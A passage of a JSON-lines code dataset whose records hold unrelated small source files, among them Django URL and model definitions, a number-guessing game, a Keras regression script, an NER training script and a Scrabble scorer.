(l-f)\n\n total_flow=p_flow*info[0]\n return total_flow\n\n#找出所有序列流量最小值及对应序列\nfor all_sort in all_sorts[:]: \n now_flow=0 #本次排列的流量\n for part in parts.values():\n part_flow=one_part_folw(part,all_sort) #每个零件的流量\n now_flow += part_flow\n\n if now_flow <= min_flow:\n min_flow=now_flow\n best_sort=all_sort[:]\n\n#—————————————————————————————输出结果——————————————————————————————————# \n\nprint('min flow:')\nprint(min_flow)\nprint('best sort:')\nfor i in range(m):\n print(obj[best_sort[i]])\n\n\n\n \n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"my_exa/计算从至表/计算从至表.py","file_name":"计算从至表.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"381894316","text":"#Homework 1 - Sam Lee\n#This program guesses the user's number\n\ndef next_guess_number(low, high):\n '''Returns the next number to guess'''\n\n return (low + high) // 2\n\ndef control_game():\n '''Main Game Controller'''\n\n name = input('What is your name? ')\n print('Hello ' + name + '! Think of a number between 1 and 100.')\n print('I will try to guess it!\\n')\n\n #initialize to start loop\n play_again = 'yes'\n\n while play_again.lower() == 'yes':\n play()\n play_again = input(\"Do you want to play again? (yes/no) \")\n\n print (\"Bye-Bye!!\")\n\n\ndef play():\n low = 0\n high = 100\n tries = 0\n\n while True:\n #Get the next guess, increment the guess tries, and ask if correct\n current_num = next_guess_number(low, high)\n tries = tries + 1\n response = input('Is your number {}? (yes/no) '.format(current_num))\n\n #Guessed correct number so break out of loop\n if response.lower() == 'yes':\n print (\"YAY! IT TOOK {} TRIES\".format(tries))\n break\n\n range_response = input('Is your number higher? (yes/no) ')\n\n #Set the highest or lowest possible value based on response\n if range_response == 'yes':\n low = current_num + 1\n else:\n high = current_num - 1\n\n#Start the program by calling Game Controller\ncontrol_game()\n","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83399118","text":"from __future__ import unicode_literals\nfrom django.conf.urls import patterns, include, url\nfrom django.views.generic import ListView, DetailView\nfrom proj.models import Blog, Circulos, CirculoForum, Musica, Participante\n\n\n\nurlpatterns = patterns('', \n\turl(r'^$', ListView.as_view(\n\t\tqueryset=Blog.objects.all().order_by(\"-date\")[:0],\n\t\ttemplate_name=\"base.html\")),\n\n\n\turl(r'^blog/$', 'proj.views.blog_view', name= 'blog_view'),\n\n\turl(r'^blog/(?P[0-9]+)/$', 'proj.views.blog_view_paginas', name= 'blog_view_paginas'),\n\n\turl(r'^blog/post/(?P[0-9]+)/$', 'proj.views.post_view', name= 'post_view'),\n\n\turl(r'^login/$', ListView.as_view(\n\t\t\t\t\t\tmodel = Blog,\n\t\t\t\t\t\ttemplate_name=\"login.html\")),\n\n\n\turl(r'^forum/$', 'proj.views.forum_page', name= 'forum_page'),\n\n\turl(r'^forum/logout/$', 'proj.views.logout_view', name= 'logout_view'),\n\n\turl(r'^forum/(?P[0-9]+)/$', 'proj.views.forum_view', name= 'forum_view'),\n\n\turl(r'^forum/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.forum_view_pagina', name= 'forum_view_pagina'),\n\n\turl(r'^forum/(?P[0-9]+)/CriarTopico/$', 'proj.views.create_post', name= 'create_post'),\n\n\turl(r'^forum/(?P[0-9]+)/postTopico/$', 'proj.views.post_topico', name= 'post_topico'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/$', 'proj.views.topico_view', name= 'topico_view'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.topico_view_paginas', name= 'topico_view_paginas'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/(?P[/comentario/]*)comentario/$', 'proj.views.post_comentario', name= 'post_comentario'),\n\n\turl(r'^forum/mensagens/$', 'proj.views.mensagens_view', name= 'mensagens_view'),\n\n\turl(r'^forum/mensagem/(?P[0-9]+)/$', 'proj.views.single_mensage', name= 'single_mensage'),\n\n\turl(r'^forum/mensagem/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.single_mensage_paginas', name= 'single_mensage_paginas'),\n\n\n\turl(r'^forum/post_mensagem/(?P[0-9]+)/$', 'proj.views.post_mensagem', name= 'post_mensagem'),\n\n\turl(r'^forum/post_mensagem/$', 'proj.views.post_mensagem_inicial', name= 'post_mensagem_inicial'),\n\n\turl(r'^forum/post_removeCom/$', 'proj.views.post_removeCom', name= 'post_removeCom'),\n\n\turl(r'^about/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"about.html\")),\n\n\turl(r'^contact/$', ListView.as_view(\n \tqueryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"contact.html\")),\n\n\turl(r'^post_email/$', 'proj.views.post_email', name= 'post_email'),\n\n\turl(r'^post_login/$', 'proj.views.login_view', name= 'login_view'),\n\n\turl(r'^post_User/$', 'proj.views.edit_names', name= 'edit_names'),\n\n\turl(r'^teste/$', 'proj.views.verifica_mensagens', name= 'verifica_mensagens'),\n\n\turl(r'^oquefazemos/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"oquefazemos.html\")),\n\n\turl(r'^parceiros/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"patrocinios.html\")),\n\t \n\t url(r'^circulos/$', ListView.as_view(\n queryset=Circulos.objects.all().order_by(\"-date\"),\n template_name=\"circulos.html\")),\n\n\t url(r'^radio/$', ListView.as_view(\n queryset=Musica.objects.all(),\n template_name=\"radio.html\")),\n\n\n\t url(r'^forum/areapessoal/$', 'proj.views.area_pessoal', name= 'area_pessoal'),\n\n\t url(r'^forum/editarperfil/$', ListView.as_view(\n\t\t\t\t\tmodel = Blog,\n\t\t\t\t\ttemplate_name=\"editarprofile.html\")),\n\n\t url(r'^forum/novamensagem/$', 'proj.views.pessoal_circulo', name= 'pessoal_circulo'),\n\n\t #url(r'^novamensagem/$', ListView.as_view(\n # queryset=Participante.objects.all(),\n # template_name=\"teste.html\")),\n\n\turl(r'^(?P\\d+)$', DetailView.as_view(\n\t\tmodel = Blog,\n\t\ttemplate_name=\"post.html\")),\n\n\turl(r'^base$', ListView.as_view(\n\t\tqueryset=Blog.objects.all().order_by(\"-date\"),\n\t\ttemplate_name=\"base.html\")),\n\n\turl(r'^api/user/$', 'proj.views.api_user', name= 'api_user'),\n\n\turl(r'^api/forum/$', 'proj.views.api_forum', name= 'api_forum'),\n\n\turl(r'^api/circulo/$', 'proj.views.api_circulo', name= 'api_circulo'),\n\n\turl(r'^api/mensagens/$', 'proj.views.api_forum', name= 'api_forum'), #notDone\n\n\turl(r'^api/mensagem/$', 'proj.views.api_mensagem', name= 'api_mensagem'), \n\n\turl(r'^api/comentario/$', 'proj.views.api_comentario', name= 'api_comentario'),\n\n\t)","sub_path":"ldso/proj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496295462","text":"#!/usr/bin/python3\n# Read the lines of the input file and sort them in various ways.\n\nimport sys\n\ndef prlines(label, lines):\n print(label+\":\")\n for x in lines:\n print(\" \"+x)\n print()\n\nlines=[]\nwhile True:\n line = sys.stdin.readline()\n if not line:\n break\n lines.append(line[:-1])\n\nprlines(\"Initial\", lines)\nlines.sort()\nprlines(\"Sorted\", lines)\n\n# This function is for sorting on the second word in the line,\n# case-insensitive. It also shows an alternate way to call the system\n# sort.\ndef second(line):\n return line.split()[1].lower()\nbysecond = sorted(lines, key=second)\nprlines(\"Sorted on second word, case insensitive\", bysecond)\n\n# Sort the lines by length.\nlines.sort(key=lambda s: len(s))\nprlines(\"Sorted by length\", lines)\n\n# Sort by the number of words, followed by the line itself.\n# The comparison function returns a tuple, which will be compared by\n# comparing the first thing, then the second if the first does not match.\ndef words_then_text(s):\n return (len(s.split()),s.lower())\nlines.sort(key=words_then_text)\nprlines(\"Sorted by number of words, then CI text\", lines)\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"394032070","text":"#!/usr/bin/env python3\nimport http.client, urllib.parse\nimport base64\nimport ssl\n\nclass WarehouseClient:\n\n\n\n def __init__(self):\n self.connection = http.client.HTTPSConnection(\"localhost:443\")\n\n\n def validAuth(self):\n try:\n creds = base64.b64encode(b'testUsername:testPassword').decode()\n header = {'Authorization': 'Basic ' + creds}\n print(\"before send request\")\n self.connection.request(\"GET\", \"/warehouse\", headers = header)\n print(\"before get response\")\n resp = self.connection.getresponse()\n if resp.status == 200:\n data = resp.read().decode(\"utf-8\")\n print(data)\n return str(data)\n else:\n print(\"error\")\n raise KeyError\n except KeyError:\n print(\"error\")\n return \"KeyError(invalid login params)\"\n\n\ndef main():\n auth = WarehouseClient()\n auth.validAuth()\n\nmain()","sub_path":"auth_client.py","file_name":"auth_client.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429018413","text":"from pystatic.domain.aggregates.file.model.file import File\n\n__author__ = 'H.Rouhani'\n\n\nclass FileRemove:\n storage_name = None\n path = None\n\n def __init__(self, dto):\n self.__dict__.update(dto)\n\n def execute(self):\n file = File(self.storage_name)\n file.path = self.path\n file.remove_by_path()\n","sub_path":"Statics/pystatic/domain/aggregates/file/app/v1_0/rest/command/internal/file_remove.py","file_name":"file_remove.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220435321","text":"from PIL import Image\nfrom sys import argv\nimport io\n\ndef main():\n image = Image.open(argv[1])\n output = io.BytesIO()\n image.save(output, format=\"jpeg\")\n image_as_string = output.getvalue()\n print(image_as_string.decode(\"utf-8\"))\nmain()\n","sub_path":"scripts/imageReader.py","file_name":"imageReader.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"190803504","text":"from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\nclass Link(models.Model):\n url = models.URLField()\n description = models.TextField(blank=True)\n posted_by = models.ForeignKey(\n settings.AUTH_USER_MODEL, blank=True, null=True, on_delete=models.CASCADE\n )\n\n\nclass Store(models.Model):\n def __str__(self):\n return \"Store: \" + self.name\n\n name = models.CharField(max_length=50)\n\n\nclass Item(models.Model):\n def __str__(self):\n return \"Item: \" + self.name\n\n name = models.CharField(max_length=50)\n qty = models.IntegerField()\n stores = models.ManyToManyField(Store, blank=True, related_name=\"items\")\n bought = models.DateField(default=None, blank=True, null=True)\n bought_by = models.ForeignKey(\n settings.AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL\n )\n\n\nclass House(models.Model):\n def __str__(self):\n return \"House: \" + self.name\n\n name = models.CharField(max_length=50)\n users = models.ManyToManyField(\n settings.AUTH_USER_MODEL, blank=True, related_name=\"houses\"\n )\n items = models.ManyToManyField(Item, blank=True, related_name=\"houses\")\n faveStores = models.ManyToManyField(Store, blank=True, related_name=\"houses\")\n\n\nclass Invite(models.Model):\n def __str__(self):\n return f\"Token for {self.first_name}\"\n\n token = models.CharField(max_length=20)\n first_name = models.CharField(max_length=50)\n last_name = models.CharField(max_length=50)\n email = models.CharField(max_length=50)\n house = models.ForeignKey(House, on_delete=models.CASCADE)\n created = models.DateField(auto_now_add=True)\n","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"603122700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 01:15:13 2020\n\n@author: oyedeepak\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# importing dataset\ndf= pd.read_csv(r\"C:\\Users\\oyedeepak\\Downloads\\Assignment\\Neural Network\\50_Startups.csv\")\ndf.head()\n\nx= df.iloc[:, :-1].values\ny= df.iloc[:, 4].values\n\n#Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder=LabelEncoder()\nx[:,3]=labelencoder.fit_transform(x[:,3])\nonehotencoder=OneHotEncoder(categorical_features=[3])\nx=onehotencoder.fit_transform(x).toarray()\n\n#Avoiding the Dummy Variable Trap\nx=x[:,1:]\n\n'''\nstates= pd.get_dummies(x['State'], drop_first= True)\nx= x.drop('State', axis= 1)\n# concat the dummy variables\n\nx= pd.concat([x, states], axis= 1)\n\n#x=x.values\n#y=y.values\n'''\n\n#splitting the dataset\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test= train_test_split(x, y, test_size= 0.2, random_state= 20)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc= StandardScaler()\nx_train= sc.fit_transform(x_train)\nx_test= sc.transform(x_test)\n\n\n#Defining Root Mean Square Error As our Metric Function \nfrom keras import backend\ndef rmse(y_true, y_pred):\n\treturn backend.sqrt(backend.mean(backend.square(y_pred - y_true), axis=-1))\n\n# importing keras and libraries\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasRegressor\n\n\n#initilising ANN\nclassifier= Sequential()\n\nx.shape\nclassifier.add(Dense(30, input_dim=5,init= 'uniform', activation='relu'))\n\nclassifier.add(Dense(25,init= 'uniform', activation='relu'))\nclassifier.add(Dense(20,init= 'uniform', activation='relu'))\nclassifier.add(Dense(15,init= 'uniform', activation='relu'))\nclassifier.add(Dense(15,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\n\n\n#output layer\nclassifier.add(Dense(output_dim=1,init= 'uniform', activation='linear'))\n\n#compile\nclassifier.compile(optimizer= keras.optimizers.Adadelta(), loss= 'mean_squared_error', metrics= [rmse])\n\n\n#fitting the ANN to training set\nclassifier.fit(x_train, y_train, batch_size=10, epochs=100)\n\n\n#preditcting the test set results\ny_pred= classifier.predict(x_test)\n\n\nfrom sklearn.metrics import r2_score\nprint(r2_score(y_test,y_pred)) #r2 score = 0.92\n","sub_path":"Neural Network/ANN_startups.py","file_name":"ANN_startups.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"481989037","text":"# coding=utf-8\n# author=yphacker\n\nimport gc\nimport os\nimport time\nimport json\nimport argparse\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nfrom importlib import import_module\nfrom conf import config\nfrom utils.data_utils2 import MyDataset, collate_fn\nfrom utils.metrics_utils import get_score\nfrom utils.utils import set_seed, get_entities\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef get_inputs(batch_x, batch_y=None):\n batch_x = tuple(t.to(device) for t in batch_x)\n if batch_y is not None:\n batch_y = batch_y.to(device)\n if 'crf' in model_name:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], input_lens=batch_x[3], labels=batch_y)\n else:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], labels=batch_y)\n else:\n if 'crf' in model_name:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], input_lens=batch_x[3])\n else:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2])\n\n\ndef evaluate(model, val_iter):\n model.eval()\n data_len = 0\n total_loss = 0\n y_true_list = []\n y_pred_list = []\n with torch.no_grad():\n for batch_x, batch_y in tqdm(val_iter):\n batch_len = len(batch_y)\n data_len += batch_len\n inputs = get_inputs(batch_x, batch_y)\n outputs = model(**inputs)\n _loss, logits = outputs[:2]\n total_loss += _loss.item() * batch_len\n y_true_list += batch_y.cpu().data.numpy().tolist()\n if 'crf' in model_name:\n preds, _ = model.crf._obtain_labels(logits, config.id2label, inputs['input_lens'])\n else:\n preds = torch.argmax(logits, dim=2)\n preds = preds.cpu().data.numpy().tolist()\n y_pred_list += preds\n return total_loss / data_len, get_score(y_true_list, y_pred_list)\n\n\ndef train(train_data, val_data, fold_idx=None):\n train_dataset = MyDataset(train_data)\n val_dataset = MyDataset(val_data)\n\n train_loader = DataLoader(train_dataset, batch_size=config.batch_size, collate_fn=collate_fn)\n val_loader = DataLoader(val_dataset, batch_size=config.batch_size, collate_fn=collate_fn)\n # val_loader = DataLoader(val_dataset, batch_size=1, collate_fn=collate_fn)\n\n model = model_file.Model().to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=model_config.learning_rate)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.1)\n\n if fold_idx is None:\n print('start')\n model_save_path = os.path.join(config.model_path, '{}.bin'.format(model_name))\n else:\n print('start fold: {}'.format(fold_idx + 1))\n model_save_path = os.path.join(config.model_path, '{}_fold{}.bin'.format(model_name, fold_idx))\n\n best_val_score = 0\n last_improved_epoch = 0\n adjust_lr_num = 0\n y_true_list = []\n y_pred_list = []\n for cur_epoch in range(config.epochs_num):\n start_time = int(time.time())\n model.train()\n print('epoch:{}, step:{}'.format(cur_epoch + 1, len(train_loader)))\n cur_step = 0\n for batch_x, batch_y in tqdm(train_loader):\n inputs = get_inputs(batch_x, batch_y)\n optimizer.zero_grad()\n outputs = model(**inputs)\n train_loss, logits = outputs[:2]\n train_loss.backward()\n optimizer.step()\n\n cur_step += 1\n # crf比较慢,训练crf时,注释\n # y_true_list += batch_y.cpu().data.numpy().tolist()\n # if 'crf' in model_name:\n # preds, _ = model.crf._obtain_labels(logits, config.id2label, inputs['input_lens'])\n # else:\n # preds = torch.argmax(logits, dim=2)\n # preds = preds.cpu().data.numpy().tolist()\n # y_pred_list += preds\n # if cur_step % config.train_print_step == 0:\n # train_score = get_score(y_true_list, y_pred_list)\n # msg = 'the current step: {0}/{1}, train loss: {2:>5.2}, train score: {3:>6.2%}'\n # print(msg.format(cur_step, len(train_loader), train_loss.item(), train_score))\n # y_true_list = []\n # y_pred_list = []\n # 过滤前3个step, 训练太少,可能会有问题\n if cur_epoch <= 3:\n continue\n val_loss, val_score = evaluate(model, val_loader)\n if val_score >= best_val_score:\n best_val_score = val_score\n torch.save(model.state_dict(), model_save_path)\n last_improved_epoch = cur_epoch\n improved_str = '*'\n else:\n improved_str = ''\n # msg = 'the current epoch: {0}/{1}, train loss: {2:>5.2}, train acc: {3:>6.2%}, ' \\\n # 'val loss: {4:>5.2}, val acc: {5:>6.2%}, {6}'\n msg = 'the current epoch: {0}/{1}, val loss: {2:>5.2}, val score: {3:>6.2%}, cost: {4}s {5}'\n end_time = int(time.time())\n print(msg.format(cur_epoch + 1, config.epochs_num, val_loss, val_score,\n end_time - start_time, improved_str))\n if cur_epoch - last_improved_epoch >= config.patience_epoch:\n if adjust_lr_num >= model_config.adjust_lr_num:\n print(\"No optimization for a long time, auto stopping...\")\n break\n print(\"No optimization for a long time, adjust lr...\")\n scheduler.step()\n last_improved_epoch = cur_epoch # 加上,不然会连续更新的\n adjust_lr_num += 1\n del model\n gc.collect()\n\n if fold_idx is not None:\n model_score[fold_idx] = best_val_score\n\n\ndef eval():\n pass\n\n\ndef predict():\n model = model_file.Model().to(device)\n model_save_path = os.path.join(config.model_path, '{}.bin'.format(model_name))\n model.load_state_dict(torch.load(model_save_path))\n model.eval()\n test_df = pd.read_csv(config.test_path)\n # submission = pd.read_csv(config.sample_submission_path)\n\n test_dataset = MyDataset(test_df, 'test')\n test_iter = DataLoader(test_dataset, batch_size=config.batch_size, shuffle=False)\n\n results = []\n with torch.no_grad():\n for batch_x, _ in tqdm(test_iter):\n inputs = get_inputs(batch_x)\n outputs = model(**inputs)\n logits = outputs[0]\n preds = torch.argmax(logits, dim=2)\n for pred in preds:\n pred = pred.cpu().data.numpy()[1:-1] # [CLS]XXXX[SEP]\n tags = [config.id2label[x] for x in pred]\n label_entities = get_entities(pred, config.id2label)\n pred_dict = dict()\n pred_dict['tag_seq'] = \" \".join(tags)\n pred_dict['entities'] = label_entities\n results.append(pred_dict)\n test_text = []\n with open(\"../data/test.json\", 'r') as fr:\n for line in fr:\n test_text.append(json.loads(line))\n submission = []\n for x, y in zip(test_text, results):\n item = dict()\n item['id'] = x['id']\n item['label'] = {}\n entities = y['entities']\n words = list(x['text'])\n if len(entities) != 0:\n for subject in entities:\n tag = subject[0]\n start = subject[1]\n end = subject[2]\n word = \"\".join(words[start:end + 1])\n if tag in item['label']:\n if word in item['label'][tag]:\n item['label'][tag][word].append([start, end])\n else:\n item['label'][tag][word] = [[start, end]]\n else:\n item['label'][tag] = {}\n item['label'][tag][word] = [[start, end]]\n submission.append(item)\n\n with open('submission.json', 'w') as outfile:\n for line in submission:\n line = json.dumps(line, ensure_ascii=False)\n outfile.write(line + '\\n')\n\n\ndef main(op):\n if op == 'train':\n train_df = pd.read_csv(config.train_path)\n # train_df = train_df[:1000]\n if args.mode == 1:\n # x = train_df['comment_text'].values\n # # y = train_df[[\"toxic\", \"severe_toxic\", \"obscene\", \"threat\", \"insult\", \"identity_hate\"]].values\n # y = train_df['toxic'].values\n # skf = StratifiedKFold(n_splits=config.n_splits, random_state=0, shuffle=True)\n # for fold_idx, (train_idx, val_idx) in enumerate(skf.split(x, y)):\n # train(train_df.iloc[train_idx], train_df.iloc[val_idx], fold_idx)\n # score = 0\n # score_list = []\n # for fold_idx in range(config.n_splits):\n # score += model_score[fold_idx]\n # score_list.append('{:.4f}'.format(model_score[fold_idx]))\n # print('val score:{}, avg val score:{:.4f}'.format(','.join(score_list), score / config.n_splits))\n pass\n else:\n train_data, val_data = train_test_split(train_df, shuffle=True, random_state=0, test_size=0.1)\n print('train:{}, val:{}'.format(train_data.shape[0], val_data.shape[0]))\n train(train_data, val_data)\n elif op == 'eval':\n pass\n elif op == 'predict':\n predict()\n\n\nif __name__ == '__main__':\n set_seed()\n parser = argparse.ArgumentParser(description='Chinese NER')\n parser.add_argument(\"-o\", \"--operation\", default='train', type=str, help=\"operation\")\n parser.add_argument(\"-b\", \"--batch_size\", default=32, type=int, help=\"batch size\")\n parser.add_argument(\"-e\", \"--epochs_num\", default=8, type=int, help=\"train epochs\")\n parser.add_argument(\"-m\", \"--model\", default='cnn', type=str, required=True,\n help=\"choose a model: bert\")\n parser.add_argument(\"-mode\", \"--mode\", default=1, type=int, help=\"train mode\")\n args = parser.parse_args()\n\n config.batch_size = args.batch_size\n config.epochs_num = args.epochs_num\n model_name = args.model\n\n model_file = import_module('models.{}'.format(model_name))\n\n if model_name in ['bert', 'bert_crf']:\n from conf import model_config_bert as model_config\n elif model_name in ['albert', 'albert_crf']:\n from conf import model_config_albert as model_config\n\n model_score = dict()\n main(args.operation)\n","sub_path":"src/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":10695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"446126734","text":"from django.urls import path\nfrom .views import CheckoutView, \\\n ItemDetailView, \\\n HomeView, \\\n add_to_card, \\\n remove_from_card, \\\n OrderSummaryView, \\\n remove_single_item_from_card, \\\n add_to_card_in_order, \\\n PaymentView, \\\n AddCouponView, \\\n RequestRefundView\n\napp_name = 'core'\n\nurlpatterns = [\n path('checkout/', CheckoutView.as_view(), name='checkout-page'),\n path('order-summary/', OrderSummaryView.as_view(), name='order-summary'),\n path('product//', ItemDetailView.as_view(), name='products-page'),\n path('', HomeView.as_view(), name='home-page'),\n path('add-to-card//', add_to_card, name='add-to-card'),\n path('add_coupon/', AddCouponView.as_view(), name='add-coupon'),\n path('add-to-card-order//', add_to_card_in_order, name='add-to-card-order'),\n path('remove_from_card//', remove_from_card, name='remove-from-card'),\n path('remove_item_from_card//', remove_single_item_from_card, name='remove-single-item-from-card'),\n path('payment//', PaymentView.as_view(), name='payment'),\n path('request-refund/', RequestRefundView.as_view(), name='request-refund')\n\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"546644805","text":"import api_server.requests as ar\nimport analysis.similarities_comparison as sc\n\napi_server = 'api-dev.nrgene.local:8080'\ndv1='maize_benchmark_test_fix_mkrs_919_03'\ndv2 = 'maize_benchmark_only_arg_wgs'\ndv3 = 'dm_gm_public_maize_232'\nsamples_wgs=['b73v4__ver100', 'cml247__ver100', 'ep1_v2__ver100', 'w22__ver100', 'ki3__ver110', 'f7_v2__ver100', 'mo17__ver100']\nsamples_snp = ['b73', 'cml247', 'ep1', 'w22', 'ki3', 'f7', 'mo17']\nn = len(samples_wgs)\nmy_dict = {}\nfor i in range(n):\n my_dict[samples_snp[i]] = samples_wgs[i]\nhap_sim1 = ar.get_raw_similarities_between_multiple_sampels(api_server, dv1, samples_wgs, \"1,2\")\nhap_sim2 = ar.get_raw_similarities_between_multiple_sampels(api_server, dv2, samples_wgs, \"1,2\")\nsnp_sim = ar.get_raw_similarities_between_multiple_sampels(api_server, dv3, samples_snp, \"1,2\").replace(my_dict)\n[fn1, fp1, intersect1] = sc.compute_similarity_match_for_multiple_sampels_in_df(hap_sim1, snp_sim, samples_wgs)\n[fn2, fp2, intersect2] = sc.compute_similarity_match_for_multiple_sampels_in_df(hap_sim2, snp_sim, samples_wgs)\nprint(\"{} {} {}\".format(fn1/1000000, fp1/1000000, intersect1/1000000))\nprint(\"{} {} {}\".format(fn2/1000000, fp2/1000000, intersect2/1000000))","sub_path":"usage_scripts_example/compare_similarities_script.py","file_name":"compare_similarities_script.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"483236575","text":"valores_scrabble = {1: ['A','E','I','O','U','L','N','R','S','T'], \n2: ['D','G'], \n3:['B', 'C', 'M', 'P'],\n4: ['F', 'H', 'V', 'W', 'Y'],\n5: 'K',\n8: ['J','X'],\n10: ['Q','Z']}\n\npuntos = (1, 2, 3, 4, 5, 8, 10)\n\ndef verificar_valor (letra : str):\n '''Recibe una letra y devuelve el puntaje de la letra'''\n i = 0\n pts = 0\n encontre = False\n while not encontre:\n if letra in valores_scrabble[puntos[i]]:\n pts = puntos[i]\n encontre = True\n else:\n i += 1\n return pts\n \n \n\npalabra = input('Ingrese una palabra (\\'FIN\\' para terminar): ').upper()\npts = 0\nwhile (palabra != 'FIN'):\n for letra in palabra:\n pts += verificar_valor(letra)\n print(f'{palabra.capitalize()}: {pts} puntos.')\n palabra = input('Ingrese una palabra (\\'FIN\\' para terminar): ').upper()\n pts = 0","sub_path":"Ej10_p2.py","file_name":"Ej10_p2.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"140197028","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .update_resource_py3 import UpdateResource\n\n\nclass LabFragment(UpdateResource):\n \"\"\"A lab.\n\n :param tags: The tags of the resource.\n :type tags: dict[str, str]\n :param lab_storage_type: Type of storage used by the lab. It can be either\n Premium or Standard. Default is Premium. Possible values include:\n 'Standard', 'Premium'\n :type lab_storage_type: str or ~azure.mgmt.devtestlabs.models.StorageType\n :param mandatory_artifacts_resource_ids_linux: The ordered list of\n artifact resource IDs that should be applied on all Linux VM creations by\n default, prior to the artifacts specified by the user.\n :type mandatory_artifacts_resource_ids_linux: list[str]\n :param mandatory_artifacts_resource_ids_windows: The ordered list of\n artifact resource IDs that should be applied on all Windows VM creations\n by default, prior to the artifacts specified by the user.\n :type mandatory_artifacts_resource_ids_windows: list[str]\n :param premium_data_disks: The setting to enable usage of premium data\n disks.\n When its value is 'Enabled', creation of standard or premium data disks is\n allowed.\n When its value is 'Disabled', only creation of standard data disks is\n allowed. Possible values include: 'Disabled', 'Enabled'\n :type premium_data_disks: str or\n ~azure.mgmt.devtestlabs.models.PremiumDataDisk\n :param environment_permission: The access rights to be granted to the user\n when provisioning an environment. Possible values include: 'Reader',\n 'Contributor'\n :type environment_permission: str or\n ~azure.mgmt.devtestlabs.models.EnvironmentPermission\n :param announcement: The properties of any lab announcement associated\n with this lab\n :type announcement:\n ~azure.mgmt.devtestlabs.models.LabAnnouncementPropertiesFragment\n :param support: The properties of any lab support message associated with\n this lab\n :type support: ~azure.mgmt.devtestlabs.models.LabSupportPropertiesFragment\n :param extended_properties: Extended properties of the lab used for\n experimental features\n :type extended_properties: dict[str, str]\n \"\"\"\n\n _attribute_map = {\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'lab_storage_type': {'key': 'properties.labStorageType', 'type': 'str'},\n 'mandatory_artifacts_resource_ids_linux': {'key': 'properties.mandatoryArtifactsResourceIdsLinux', 'type': '[str]'},\n 'mandatory_artifacts_resource_ids_windows': {'key': 